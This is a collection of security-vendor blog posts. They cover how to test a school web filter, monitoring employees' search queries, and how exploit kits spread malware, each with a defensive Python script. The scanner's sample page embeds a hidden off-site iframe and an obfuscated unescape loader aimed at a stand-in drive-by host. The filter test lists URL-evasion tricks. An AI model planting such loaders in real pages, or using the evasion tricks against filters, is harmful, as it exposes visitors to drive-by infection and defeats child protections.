Thursday 8 May 2014

Protecting Tech-savvy kids

Kids these days have been born and bred in a world that people like myself (despite being 34 years old) have had to get used to. It’s no wonder, then, that many of today’s kids are much more tech-savvy than their parents. It’s not just a possibility that kids are teaching their parents about technology; it’s a fact of life.

I would also dare say that kids are often not just more tech-savvy than their parents, but also more tech-savvy than their educators. And despite web filtering being a basic need in schools and educational institutions, there are cases where either web filtering is not deployed, or the kids have figured out a way to bypass the web filtering technology.

Sometimes it’s not even a question of being tech-savvy; it’s a question of access to information. During my research on web filtering technology I often come across forum threads asking how to bypass a particular web filter, many of them posted by children in schools.

So it’s not really surprising to read something like yesterday’s news, where it was discovered that fourth and fifth graders at a school in Illinois were able to access pornography on a school computer. Although it is possible that the kids bypassed the web filtering software themselves, the reasons are often much simpler. Truth be told, cash-strapped schools may simply not look for a complete solution that ensures users aren’t able to access dodgy sites at school.

The good thing is that being cash-strapped is not really an excuse: web filtering technology such as GFI Cloud is very affordable and, correctly set up, will ensure that students aren’t able to access pornography or other problematic sites. Parents should do their part too, by demanding that good controls are in place.

Specifically in the US, federal funding is available for the implementation of web filtering and other protective technologies under the Children’s Internet Protection Act (CIPA). GFI Cloud and other GFI technologies help schools and other educational institutions achieve CIPA compliance and thus become eligible for that funding.

Steps to prevent the bypassing of web filtering technologies


It’s a good idea to test the web filtering implementation well before going live. Protecting the filter usually takes simple steps such as deploying group policies to the computers (for example, locking the browser’s proxy settings), removing local administrative rights so that students cannot change network settings or install their own proxy or VPN software, and making sure the filter also covers direct-IP and HTTPS traffic rather than only plain hostnames. It is also a good idea for the company implementing the web filter to think like a kid and actively look for ways to bypass it. If they can do it, rest assured that the kids will find a way around it too.
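One concrete way to “think like a kid” before going live is to feed the filter the URL spellings a student would try and see which get through. The script below is an added example written for this post, not code from GFI Cloud or any other product: it models a naive block-list check (regex on the raw URL, exact host comparison) next to a hardened one (parse the URL, normalise the host, match by domain suffix, refuse raw IP literals, fail closed) and reports which trick each lets through. The blocked domain, the decoy host school.example and the address 192.0.2.10 are made-up sample data.

```python
"""Exercise a web filter's block list with the URL spellings a determined
student would try, before the filter goes live.

Constructed example for this post, not the logic of GFI Cloud or any other
product. The blocked domain, the "school.example" decoy and the IP address
are made-up sample data.
"""
import re
from ipaddress import ip_address
from typing import Callable, Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Constructed block list for the demonstration.
BLOCKED_DOMAINS = {"blocked.example"}


def naive_filter(url: str) -> bool:
    """Return True if the URL is blocked.

    Models the easy-to-write check: pull the host out of the raw URL with a
    regex and compare it verbatim against the block list.
    """
    match = re.match(r"^https?://([^/]+)", url)
    host = match.group(1) if match else ""
    return host in BLOCKED_DOMAINS


def normalise_host(url: str) -> Optional[str]:
    """Hostname of url, lower-cased, percent-decoded and without a trailing
    dot; None when the URL has no usable host."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return None
    host = parts.hostname  # urlsplit already strips userinfo and the port
    if not host:
        return None
    return unquote(host).lower().rstrip(".")


def is_ip_literal(host: str) -> bool:
    """True for a bare IPv4/IPv6 address (IPv6 may be bracketed)."""
    try:
        ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def hardened_filter(url: str) -> bool:
    """Return True if the URL is blocked.

    Normalises the host first, matches by domain suffix so subdomains are
    covered, refuses raw IP literals (they sidestep hostname-based
    categorisation) and fails closed on anything it cannot parse.
    """
    host = normalise_host(url)
    if host is None or is_ip_literal(host):
        return True
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def bypass_variants(domain: str, ip: str) -> Dict[str, str]:
    """Spellings of one blocked site that a student might type in."""
    encoded = "".join("%%%02X" % ord(c) for c in domain)
    return {
        "plain": "http://%s/" % domain,
        "uppercase": "HTTP://%s/" % domain.upper(),
        "trailing dot": "http://%s./" % domain,
        "alternate port": "http://%s:8080/" % domain,
        "https": "https://%s/" % domain,
        "userinfo decoy": "http://school.example@%s/" % domain,
        "percent-encoded host": "http://%s/" % encoded,
        "direct IP": "http://%s/" % ip,
        "subdomain": "http://cdn.%s/" % domain,
    }


def find_gaps(filter_fn: Callable[[str], bool],
              domain: str = "blocked.example",
              ip: str = "192.0.2.10") -> List[str]:
    """Names of the variants that filter_fn lets through."""
    return [name for name, url in bypass_variants(domain, ip).items()
            if not filter_fn(url)]


if __name__ == "__main__":
    for name, fn in (("naive", naive_filter), ("hardened", hardened_filter)):
        print("%-8s filter lets through: %s" % (name, find_gaps(fn) or "nothing"))
```

Run as-is, the naive check misses seven of the nine spellings (everything except the plain and https forms), while the hardened one blocks them all. The direct-IP case is the one that most often survives a real deployment: a filter that only categorises hostnames has nothing to match when the student types the address instead, so either block raw-IP browsing outright or categorise by resolved address as well.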


GFI Cloud allows you to implement good web filtering technology that helps protect students from accessing pornography or bypassing the web filter. If you would like to know more about GFI Cloud – Web Protection server, visit: http://www.gficloud.com

Wednesday 4 December 2013

Gauging employees’ moods using their search trends

In today’s world it is not difficult to understand the need for web filtering. The threats being pushed through websites are pervasive and ever-increasing, and you should already know that you need multiple web security engines in place, including a web filtering solution. Besides filtering based on website addresses and categories, there are a number of features that stand out and give the company additional benefits. One of these is search engine query monitoring. By monitoring what a user is actively searching for on the popular search engines, you can gauge an employee’s mood. By monitoring these searches one can determine a number of things:
  1. Whether the user is actively performing work-related searches (most of their queries should be work related) 
  2. Whether they are doing anything suspicious 
  3. Whether they have particular personal or personality problems which might require the company’s assistance

So what exactly is search engine query monitoring?

Search engine query monitoring is the ability to identify and log the search terms when users perform a search on a search engine. So if I run the following query, https://www.google.com/#q=talk+tech+to+me , the web filter will extract the keywords “talk tech to me” from the URL and log them.

Why is it useful?

Well, under most circumstances you will see mundane stuff: typically searches related to the user’s work and, many times, their personal interests. However, there are instances where you will see things the company probably wants to be aware of. Say you find something like https://www.google.com/#q=web+filter+bypass ; you will immediately know that this user is trying to do something fishy. Even more worrying would be a query such as https://www.google.com/#q=ways+to+commit+suicide . Essentially, besides the websites a user is trying to visit, the searches they conduct give a very clear picture of whether all is ok, or whether there is something wrong or any suspicious activity.

Great, tell me how to do it!

GFI WebMonitor provides this functionality as a standard part of its web filtering features. You can define policies to exclude users who you don’t want to be monitored, but by default users’ search queries are monitored and logged.

What search engines are supported?

Google, Bing, Yahoo! and Lycos. Queries on any of these search engines will be monitored. Given that Yandex is the most popular search engine in Russia and other Eastern European countries, GFI WebMonitor also supports search engine monitoring for Yandex.

Search over HTTPS? Will search engine monitoring work in this case?

We’ve seen many search engines move to sending search queries over HTTPS. This has created a bit of a furore in the web analytics world, but it does not really affect GFI WebMonitor, since HTTPS scanning is supported. Like any HTTPS-inspecting proxy, it does this by issuing its own certificates for the sites visited, so its certificate authority must be trusted on each managed computer; once that is in place and HTTPS scanning is enabled, GFI WebMonitor can still inspect queries sent over HTTPS and they will still show up in the logs. This is also a security feature: if users visit HTTPS-based websites, GFI WebMonitor can still monitor and protect the end user. Bear in mind that HTTPS inspection decrypts all of the user’s HTTPS traffic, not just searches, so it should be covered by the company’s acceptable use policy.

What value does this give me?

We’ve already identified a number of ways this helps you gauge the mood of employees in the company. Moreover, GFI WebMonitor can run a periodic report searching for the specific keywords you are most interested in. For example, by default GFI WebMonitor ships with a number of reports that give a company value out of the box, without having to configure anything:

1) TV Series or Movie Downloads – people searching for TV series or movies to download, which could lead to legal liability when pirated material is downloaded via the company’s connection

2) Adult and Pornography Searches – people searching for adult content via search engines despite you blocking adult websites

3) High Risk Searches – searches for explosives, weapons, suicide or other potentially problematic situations

4) Your own custom search term report – GFI WebMonitor allows you to easily create your own reports for specific terms, in any language you want
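To make the two ideas above concrete, the extraction of the search terms from a URL (the https://www.google.com/#q=... example earlier) and the matching of logged queries against keyword reports, here is an added example written for this post; it is not GFI WebMonitor’s code. The per-engine query parameter names (q for Google and Bing, p for Yahoo!, text for Yandex) are assumptions based on those engines’ public URL formats, the term lists are illustrative, and the proxy log lines are constructed.

```python
"""Pull search terms out of proxy-logged URLs and match them against
keyword reports, in the spirit of the search engine query monitoring
described above.

Constructed example for this post, not GFI WebMonitor's own code. The
per-engine parameter names are assumptions based on the public URL formats
of those engines, and the log lines are made up.
"""
import re
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import parse_qs, urlsplit

# (host pattern, name of the query-string parameter carrying the search terms)
ENGINES = [
    (re.compile(r"(^|\.)google\.[a-z.]+$"), "q"),
    (re.compile(r"(^|\.)bing\.com$"), "q"),
    (re.compile(r"(^|\.)search\.yahoo\.[a-z.]+$"), "p"),
    (re.compile(r"(^|\.)yandex\.[a-z]+$"), "text"),
]

# Keyword reports: the three built-in categories the post lists plus a
# custom one for filter-bypass attempts. Term lists are illustrative only.
REPORTS: Dict[str, Set[str]] = {
    "TV Series or Movie Downloads": {"torrent", "download", "episode"},
    "Adult and Pornography Searches": {"porn", "xxx"},
    "High Risk Searches": {"explosives", "weapons", "suicide"},
    "Custom: Filter Bypass": {"bypass", "proxy", "unblock"},
}

# Constructed proxy log: "<timestamp> <user> <url>" per line.
SAMPLE_LOG = """\
2013-12-04T09:12:01Z alice https://www.google.com/#q=talk+tech+to+me
2013-12-04T09:13:44Z bob https://www.google.com/#q=web+filter+bypass
2013-12-04T09:15:02Z carol https://www.bing.com/search?q=quarterly+report+template
2013-12-04T09:20:19Z dave https://search.yahoo.com/search?p=ways+to+commit+suicide
2013-12-04T09:21:00Z erin https://yandex.ru/search/?text=%D0%BF%D0%BE%D0%B3%D0%BE%D0%B4%D0%B0
2013-12-04T09:22:30Z frank https://intranet.example/wiki?q=not+a+search
"""


def extract_query(url: str) -> Optional[str]:
    """Search terms from a URL on a supported engine, else None.

    Both the query string and the fragment are checked: Google's AJAX-era
    interface carried the terms after '#', as in the post's example.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    for pattern, param in ENGINES:
        if pattern.search(host):
            for component in (parts.query, parts.fragment):
                values = parse_qs(component).get(param)
                if values and values[0].strip():
                    return values[0].strip()
            return None
    return None


def classify(query: str) -> List[str]:
    """Names of the reports whose term list the query matches."""
    words = set(re.findall(r"\w+", query.lower()))
    return sorted(name for name, terms in REPORTS.items() if words & terms)


def scan_log(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """(user, query, matching reports) for every search found in the log."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        _timestamp, user, url = fields
        query = extract_query(url)
        if query is not None:
            hits.append((user, query, classify(query)))
    return hits


if __name__ == "__main__":
    for user, query, reports in scan_log(SAMPLE_LOG):
        print("%-6s %-28r %s" % (user, query, ", ".join(reports) or "-"))
```

Two details matter in practice: the query is percent-decoded before matching (the Yandex line carries a Cyrillic query, and a report in another language works the same way), and a q= parameter on a non-search host (the intranet line) is ignored rather than logged as a search. Word-level matching keeps “download” from firing on “downloaded”; if you want stemming or phrase matching, that is where to extend classify().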

Interested yet? Try GFI WebMonitor for 30 days and monitor what your users are searching for. You might be surprised!

Malware as a Service

Cloud-based services are all the rage these days; just about every kind of software is available as a cloud or software-as-a-service offering. And when we say every kind of software service, we do mean every kind, including malicious software services. Malware as a service has become by far the most common way that malware is distributed. Here we’ll attempt to give a non-technical overview of how this industry works.

So what exactly is Malware-as-a-Service (MaaS) and why is it used?

Malware as a service is essentially an online service used by people who have written a specific piece of malware and want it distributed quickly. Essentially, the MaaS takes the headache out of distributing the malware. Let’s say you’ve written your own malware program which you want to distribute. You could do a few things to push its distribution:

1. Infect pirated software with your malware and upload it to common piracy websites
2. Create a website which invites visitors to download something fake which in reality is your malware
3. Make the malware self-replicating and spread it via some kind of software vulnerability
4. Infect your friends’ USB sticks with the malware and rename it to something which they are likely to open

As you can see, all of the above either require a significant amount of effort or are not really effective. MaaS, most commonly in the form of an exploit kit, effectively allows you to distribute your malware at a very cost-effective price. If your malware is going to give you financial benefits, then a MaaS service to distribute it widely will be very handy, and very cheap. Quoted prices for certain exploit kits start from as low as $50 for a day’s use to $1,500 for a year’s service, making it very cheap considering its effectiveness.

But how does the infection happen?

There are a number of steps involved in infecting a user. Let’s say that you don’t want to go through the above processes to distribute the malware and you’ve decided to use an exploit kit. After paying for the service, the following happens:

Step 1: Your malware is loaded onto a distribution server, ready to be deployed to new victims

Step 2: The MaaS operators find legitimate websites whose servers or web applications have vulnerabilities or misconfigurations. These allow them to inject a piece of hidden HTML code (typically an invisible iframe, or an obfuscated script that writes one) into the legitimate pages; this hidden code is what performs the malicious actions that follow

Step 3: A normal user visits the legitimate (but compromised) website. The hidden code analyses the visitor and detects which browser, browser plug-ins and other software they have installed. If the user has software which has not been patched, the next step is executed

Step 4: Based on the analysis in step 3, the user is redirected to another website which uses an exploit targeted at that unpatched software to infect the user with the malware. For example, if a user has a version of Java which hasn’t been updated, they will be redirected to a Java exploit

Step 5: The exploit is executed, using the unpatched vulnerability to deploy the malware
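The injected code from step 2 is the one part of this chain a site owner or a web security scanner can look for directly. The scanner below is an added example written for this post, not the detection logic of any GFI product: it parses a page and flags iframes that are both invisible (1×1 or zero size, display:none, visibility:hidden, or positioned far off-screen) and point off-site, plus the classic obfuscated loader pattern document.write(unescape('%3Ciframe…')) whose decoded markup points off-site. The sample page, the hostnames legit.example, cdn.legit.example and drive-by.example, and the address 203.0.113.7 are all constructed.

```python
"""Scan a web page for the injected, hidden content an exploit kit plants
on a compromised legitimate site (step 2 above): invisible iframes pointing
off-site, and obfuscated inline scripts that write such an iframe at load
time.

Constructed example for this post, not the detection logic of any GFI
product. The sample page, its hostnames and the 203.0.113.7 address are
made up.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Constructed page: a legitimate site with two injected elements.
SAMPLE_PAGE = """\
<html><head><title>Legit site</title>
<script src="https://cdn.legit.example/app.js"></script></head>
<body><h1>Welcome</h1>
<iframe src="https://legit.example/video" width="640" height="360"></iframe>
<iframe src="http://203.0.113.7/stats/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fdrive-by.example%2Fl%2F%22%20width%3D%220%22%20height%3D%220%22%3E%3C%2Fiframe%3E'));</script>
</body></html>
"""

Finding = Tuple[str, str]  # (kind of finding, URL involved)


def is_hidden(attrs: Dict[str, Optional[str]]) -> bool:
    """Element is invisible by size, CSS display/visibility or off-screen position."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if re.search(r"(left|top):-\d{3,}px", style):
        return True
    try:
        width = int(attrs.get("width") or 100)
        height = int(attrs.get("height") or 100)
    except ValueError:
        return False
    return width <= 1 or height <= 1


def is_offsite(src: str, site_host: str) -> bool:
    """True when src points at a host other than the site (or its subdomains)."""
    host = (urlsplit(src).hostname or "").lower()
    return bool(host) and host != site_host and not host.endswith("." + site_host)


class InjectedContentScanner(HTMLParser):
    """Collect (finding kind, URL) pairs while parsing."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings: List[Finding] = []
        self._script_body: Optional[List[str]] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or ""
        if tag == "iframe" and src and is_hidden(a) and is_offsite(src, self.site_host):
            self.findings.append(("hidden offsite iframe", src))
        elif tag == "script" and not src:
            self._script_body = []  # start buffering an inline script

    def handle_data(self, data):
        if self._script_body is not None:
            self._script_body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_body is not None:
            self._inspect_script("".join(self._script_body))
            self._script_body = None

    def _inspect_script(self, body: str) -> None:
        # Classic drive-by loader: document.write(unescape('%3Ciframe...'))
        # Decode each unescape() literal and look for off-site src= targets.
        for literal in re.findall(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)", body):
            decoded = unquote(literal)
            for src in re.findall(r'src\s*=\s*["\']([^"\']+)["\']', decoded):
                if is_offsite(src, self.site_host):
                    self.findings.append(("obfuscated document.write iframe", src))


def scan_html(html: str, site_host: str) -> List[Finding]:
    """Parse html as served from site_host and return all findings."""
    scanner = InjectedContentScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, url in scan_html(SAMPLE_PAGE, "legit.example"):
        print("%-34s %s" % (kind, url))
```

On the sample page the visible video iframe and the site’s own CDN script are left alone, while the 1×1 hidden iframe and the decoded drive-by.example iframe are reported. Real kits vary the obfuscation (string splitting, fromCharCode, eval chains), so treat the unescape() pattern as one signature among many rather than a complete detector; the structural check (hidden plus off-site) is the more durable half.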

The effectiveness of the distribution is due to a number of reasons:

1. The sheer number of compromised websites (millions) which exist on the internet right now, and which will keep getting compromised in the future, exposing a huge audience to the malware

2. The fact that these are legitimate sites which normal users visit anyway; they have simply been hijacked with some invisible malicious code

3. The delivery of an exploit targeted at the specific user’s unpatched software: the kit attacks the user with an exploit it knows will work

4. The fact that the exploit does not need any additional user interaction such as a click or a download. Just visiting the website results in an infection (what is termed a drive-by download)

5. The lucrative business of MaaS, which allows the authors to keep expanding the sites they use, the exploits they use and their anti-virus evasion techniques

6. The use of spamming, SEO poisoning and other techniques to push users towards the compromised sites

How effective are these kits? And how many of them are there?

Very effective. Different security vendors quote different numbers for each kit, but all of them agree on one conclusion: the malicious websites used by these kits make up the absolute majority of threats in the wild today. The majority of infections happening today come from these exploit kits; old viruses and distribution methods have become insignificant compared to these new malicious URLs. There are tens of exploit kits out there: the Blackhole exploit kit used to be one of the most effective (though its author, Paunch, has reportedly been arrested and the kit is no longer being updated), along with Neutrino, Glazunov and many more. As the business gets more lucrative, the MaaS authors compete among themselves, making improvements in all aspects of the kit, from usability and price to infection and obfuscation techniques.

Ouch! … How do I protect myself and my employees?

Essentially, you can never know or keep track of which legitimate websites have been compromised, so you need a little help. You’ll need to put multiple mechanisms in place to protect yourself and your employees. First, make sure all the browsers, browser plug-ins and other software on your users’ machines are fully patched; removing plug-ins that aren’t needed (Java being the usual example from the steps above) shrinks the attack surface further. GFI LanGuard or GFI Cloud – Patch Management is an essential tool to help you with this. Second, put web security software in place which stops users from visiting websites that have been detected to contain malicious payloads; GFI WebMonitor or GFI Cloud Web Protection will both protect your users from visiting these websites. Thirdly, you still need anti-virus on your machines to ensure that malicious payloads are detected and stopped; GFI Cloud – Anti-virus is the right tool here. If you miss any of these protections, it’s only a matter of time before your users are exposed to something dangerous without their knowledge.